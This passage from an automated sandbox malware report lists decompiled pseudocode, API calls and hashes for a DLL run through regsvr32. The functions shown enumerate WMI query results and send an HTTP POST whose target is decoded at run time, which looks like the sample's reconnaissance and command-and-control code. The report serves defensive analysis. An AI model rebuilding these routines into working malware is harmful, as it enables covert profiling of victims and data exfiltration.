Instruction Fuzzy Hash: 11513A77D11508EBEB04CF94DA42B9DB7B2FF94314F2981A9C845A7280C734AF11EB94

Uniqueness

Uniqueness Score: -1.00%

Function 10012346, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8030d81dc236fa19504743191c490e51e4050de0e9408ade4ea3357c27d2e4ca
Instruction ID: 1f3934e2420efc180bb9c0cbc4fac13afaf5f650056083a87c6d8f741bd90931
Opcode Fuzzy Hash: 8030d81dc236fa19504743191c490e51e4050de0e9408ade4ea3357c27d2e4ca
Instruction Fuzzy Hash: 6E2192766150128BD35CDF2CD8A2A69F3A5FB48310F45427ED42BCB682CB71E492CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1000DB3C, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E1000DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E1000D523(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E10008604(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E1000861A( &_v60, 0xfffffffe);
					E1000D5D7( &_v104);
					return _t320;
				}
				_t165 = E100095E1(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E100095E1(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E100092E5(_t165);
				_v60 = _t322;
				E100085D5( &_v52);
				E100085D5( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E100095E1(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E100085D5( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E1000861A( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E100091E3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E100091E3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E10008698(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E10008604( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E1000861A(_t136, 0);
								E1000861A( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E100091E3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E100095E1(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E100095E1(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E100085D5( &_v92);
											E100085D5( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E10009640();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E100095E1(_t283, 0x219);
										E10009640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E100085D5( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E100091E3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E1000DA20( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E1000861A( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}

0x1000db45
0x1000db4b
0x1000db52
0x1000db55
0x1000db58
0x1000db5d
0x1000db5f
0x1000db64
0x1000dfac
0x1000dfac
0x1000db71
0x1000db73
0x1000db76
0x1000db79
0x1000df91
0x1000df97
0x1000dfa1
0x00000000
0x1000dfa6
0x1000db84
0x1000db8b
0x1000db92
0x1000db95
0x1000db9a
0x1000db9c
0x1000db9f
0x1000dba2
0x1000dba3
0x1000dbac
0x1000dbb2
0x1000dbb5
0x1000dbbe
0x1000dbc3
0x1000dbc8
0x1000dbdf
0x1000dbec
0x1000dbef
0x1000dbf6
0x1000dbfb
0x1000dc02
0x1000dc07
0x1000dc0e
0x1000dc10
0x1000dc1c
0x1000dc1f
0x1000dc21
0x1000df81
0x1000df82
0x1000df8b
0x00000000
0x1000df8b
0x1000dc27
0x1000dc2a
0x1000dc2d
0x1000dc30
0x1000dc32
0x1000df4d
0x1000df50
0x1000df53
0x1000df55
0x1000df77
0x1000df7c
0x1000df57
0x1000df5a
0x1000df65
0x1000df6c
0x1000df6c
0x00000000
0x00000000
0x00000000
0x00000000
0x1000dc38
0x1000dc38
0x1000dc4a
0x1000dc4d
0x1000dc4f
0x00000000
0x00000000
0x1000dc57
0x1000dc5a
0x1000dc5d
0x1000dc60
0x1000dc63
0x1000dc66
0x00000000
0x00000000
0x1000dc6c
0x1000dc7a
0x1000dc7d
0x1000dc7f
0x1000dc98
0x1000dca7
0x1000dcaf
0x1000dcaf
0x1000dcb2
0x1000dcb9
0x1000dcbd
0x1000dcc3
0x1000dcc5
0x1000df35
0x1000df3b
0x1000df41
0x1000df44
0x1000df44
0x00000000
0x1000df44
0x1000dcd4
0x1000dce8
0x1000dcec
0x1000dcee
0x1000dcf3
0x1000df02
0x1000df08
0x1000df13
0x1000df1e
0x1000df24
0x1000df2a
0x1000df2d
0x00000000
0x1000df2d
0x1000dcf9
0x1000ded0
0x1000ded0
0x1000ded3
0x1000ded6
0x00000000
0x00000000
0x1000dd01
0x1000dd09
0x1000dd10
0x1000dd16
0x1000dd18
0x00000000
0x00000000
0x1000dd21
0x1000dd36
0x1000dd3c
0x1000dd45
0x1000dd48
0x1000dd4b
0x1000dd4d
0x1000dec3
0x1000dec6
0x1000decf
0x1000decf
0x00000000
0x1000decf
0x1000dd5d
0x1000dd60
0x1000dd67
0x1000dd6d
0x1000dd70
0x1000dd73
0x1000dd76
0x1000dd79
0x1000ddb5
0x1000ddb5
0x1000ddb8
0x1000de64
0x1000de78
0x1000de88
0x1000de8c
0x1000de8e
0x1000dea5
0x1000dea9
0x1000deb2
0x1000debd
0x00000000
0x1000debd
0x1000de94
0x1000de95
0x1000de9a
0x1000de9a
0x1000de9c
0x1000de9d
0x1000dea2
0x00000000
0x1000dea2
0x1000ddbe
0x1000ddbe
0x1000ddc1
0x1000de2c
0x1000de40
0x1000de50
0x1000de54
0x1000de56
0x00000000
0x00000000
0x1000de5c
0x1000de5d
0x00000000
0x1000de5d
0x1000ddc3
0x1000ddc3
0x1000ddc6
0x00000000
0x00000000
0x1000ddc8
0x1000ddcb
0x00000000
0x00000000
0x1000ddcd
0x1000ddcd
0x1000ddd3
0x1000ddef
0x1000ddfe
0x1000de07
0x1000de0c
0x1000de0f
0x1000de15
0x1000de15
0x1000de1a
0x1000de26
0x00000000
0x1000de26
0x1000ddd8
0x00000000
0x1000ddd8
0x1000dd7b
0x1000dda2
0x1000dda7
0x1000ddac
0x1000ddae
0x1000ddae
0x00000000
0x1000ddac
0x1000dd7d
0x1000dd7d
0x1000dd80
0x00000000
0x00000000
0x1000dd86
0x1000dd86
0x1000dd89
0x00000000
0x00000000
0x1000dd8f
0x1000dd8f
0x1000dd92
0x00000000
0x00000000
0x1000dd98
0x1000dd9b
0x00000000
0x00000000
0x1000dd9d
0x00000000
0x1000dd9d
0x1000dedf
0x1000dee5
0x1000deeb
0x1000deee
0x1000def1
0x1000def1
0x1000def4
0x1000def5
0x1000def8
0x1000defa
0x00000000
0x00000000
0x1000df4a
0x1000df4a
0x00000000
0x1000df4a
0x1000dc81
0x1000dc87
0x00000000
0x1000dc87
0x1000df47
0x00000000
0x1000dbca
0x1000dbcf
0x1000dbd4
0x00000000
0x1000dbd8

APIs

Part of subcall function 1000D523: CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
Part of subcall function 1000D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
Part of subcall function 1000D523: CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
Part of subcall function 1000D523: SysAllocString.OLEAUT32(00000000), ref: 1000D569
Part of subcall function 1000D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

SysAllocString.OLEAUT32(00000000), ref: 1000DBE5
SysAllocString.OLEAUT32(00000000), ref: 1000DBF9
SysFreeString.OLEAUT32(?), ref: 1000DF82
SysFreeString.OLEAUT32(?), ref: 1000DF8B

Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660

Strings

FALSE, xrefs: 1000DDAE
TRUE, xrefs: 1000DDA7

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: String$Alloc$Free$HeapInitialize$BlanketCreateInstanceProxySecurity
String ID: FALSE$TRUE
API String ID: 224402418-1412513891
Opcode ID: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
Instruction ID: 5411e9e7cadc0f68074cac65ab41d21575f1dfdd33ecf7b2672d11ac1b24c815
Opcode Fuzzy Hash: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
Instruction Fuzzy Hash: 13E16375D002199FEB15EFE4C885EEEBBB9FF48380F10415AF505AB259DB31AA01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000E668, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E1000E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E100095C7(0x85b);
				_v60 = E100095C7(0xdc9);
				_v56 = E100095C7(0x65d);
				_v52 = E100095C7(0xdd3);
				_t105 = E100095C7(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E1000C379(_t214));
				_t113 =  *0x1001e6a4; // 0x0
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0x1001e6a4; // 0x0
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0x1001e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0x1001e6a4; // 0x0
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E1000980C(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0x1001e6a4; // 0x0
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E1000980C(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E100095C7(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0x1001e6a4; // 0x0
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E1000C379(_t217), _a4, _a8);
										E100085C2( &_v12);
										if(_a24 != 0) {
											E1000980C(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0x1001e6a4; // 0x0
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E10009749( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0x1001e6a4; // 0x0
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0x1001e6a4; // 0x0
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0x1001e6a4; // 0x0
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0x1001e6a4; // 0x0
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0x1001e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0x1001e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0x1001e6a4; // 0x0
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0x1001e6a4; // 0x0
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}

0x1000e671
0x1000e683
0x1000e68c
0x1000e696
0x1000e69a
0x1000e6ab
0x1000e6c2
0x1000e6cf
0x1000e6dc
0x1000e6e9
0x1000e6ec
0x1000e6f1
0x1000e6f6
0x1000e6f8
0x1000e700
0x1000e70b
0x1000e712
0x1000e71e
0x1000e721
0x1000e72f
0x1000e732
0x1000e738
0x1000e739
0x1000e73b
0x1000e744
0x1000e745
0x1000e74a
0x1000e750
0x1000e75a
0x1000e75c
0x1000e761
0x1000e761
0x1000e770
0x1000e77f
0x1000e783
0x1000e792
0x1000e795
0x1000e79a
0x1000e79e
0x1000e7a5
0x1000e7ac
0x1000e7b4
0x1000e7bc
0x1000e7c3
0x1000e7cb
0x1000e7d3
0x1000e7da
0x1000e7e2
0x1000e7ea
0x1000e7ff
0x1000e80c
0x1000e80e
0x1000e813
0x1000e813
0x1000e81a
0x1000e82b
0x1000e830
0x1000e832
0x1000e832
0x1000e846
0x1000e858
0x1000e85a
0x1000e85d
0x1000e862
0x1000e862
0x1000e869
0x1000e878
0x1000e87c
0x1000e8ba
0x1000e8bf
0x1000e8c7
0x1000e8cc
0x1000e8d7
0x1000e8dd
0x1000e8e7
0x1000e8ea
0x1000e8f3
0x1000e8f8
0x1000e8f8
0x1000e901
0x1000e94a
0x1000e94c
0x1000e953
0x1000e954
0x1000e957
0x1000e95d
0x1000e961
0x1000e962
0x1000e967
0x1000e969
0x1000e96f
0x1000e984
0x1000e98c
0x1000e9c1
0x1000e9c6
0x1000e9cb
0x00000000
0x1000e9cd
0x1000e98e
0x1000e990
0x1000e990
0x1000e999
0x1000e99c
0x1000e99e
0x1000e9a0
0x1000e9a6
0x1000e9a6
0x1000e9ab
0x1000e9ad
0x1000e9b4
0x1000e9b4
0x00000000
0x1000e9b7
0x1000e971
0x1000e979
0x00000000
0x1000e903
0x1000e903
0x1000e909
0x1000e90f
0x1000e912
0x00000000
0x1000e912
0x1000e901
0x1000e87e
0x1000e884
0x1000e888
0x1000e889
0x1000e88e
0x1000e890
0x1000e896
0x1000e8b4
0x1000e8b4
0x00000000
0x1000e8b4
0x1000e898
0x1000e8a2
0x1000e8a4
0x1000e8a5
0x1000e8aa
0x1000e8ac
0x1000e8b2
0x00000000
0x00000000
0x00000000
0x1000e86b
0x1000e86b
0x1000e914
0x1000e914
0x1000e91a
0x1000e91d
0x00000000
0x1000e91d
0x1000e81c
0x1000e81c
0x1000e91f
0x1000e91f
0x1000e925
0x1000e928
0x00000000
0x1000e928
0x1000e81a
0x1000e785
0x1000e92a
0x1000e92d
0x1000e92f
0x1000e932
0x1000e935
0x1000e93e
0x1000e943
0x00000000
0x00000000
0x1000e947
0x00000000
0x1000e947
0x1000e754
0x00000000

APIs

memset.MSVCRT ref: 1000E69A
memset.MSVCRT ref: 1000E6AB
memset.MSVCRT ref: 1000E700
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 1000E785

Strings

POST, xrefs: 1000E84B

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: memset$ErrorLast
String ID: POST
API String ID: 2570506013-1814004025
Opcode ID: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
Instruction ID: 0700470c0a68c42d93125f8ed8f5d74d0b9e7f5cef555f12c6cb43bca8eeeaa5
Opcode Fuzzy Hash: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
Instruction Fuzzy Hash: ACB14CB1900258AFEB55CFA4CC88E9E7BF8EF48390F108069F505EB291DB749E44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100116B8, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E100116B8(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}

0x100116c1
0x100116c8
0x100116d1
0x100116d5
0x10011750
0x00000000
0x10011752
0x100116e3
0x100116e5
0x100116ea
0x00000000
0x00000000
0x100116f2
0x100116f4
0x100116f9
0x00000000
0x00000000
0x10011703
0x10011707
0x00000000
0x00000000
0x10011709
0x1001170e
0x10011710
0x10011711
0x10011715
0x1001171b
0x00000000
0x00000000
0x10011726
0x1001172f
0x10011733
0x00000000
0x00000000
0x10011735
0x10011737
0x1001173f
0x10011741
0x10011742
0x1001174a
0x00000000

APIs

GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,1000765A,?,?,00000000,?), ref: 100116CB
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 100116E3
GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 100116F2
GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 10011701

Strings

advapi32.dll, xrefs: 100116C3
CryptAcquireContextA, xrefs: 100116DD
CryptGenRandom, xrefs: 100116EC
CryptReleaseContext, xrefs: 100116FB

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 667068680-129414566
Opcode ID: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
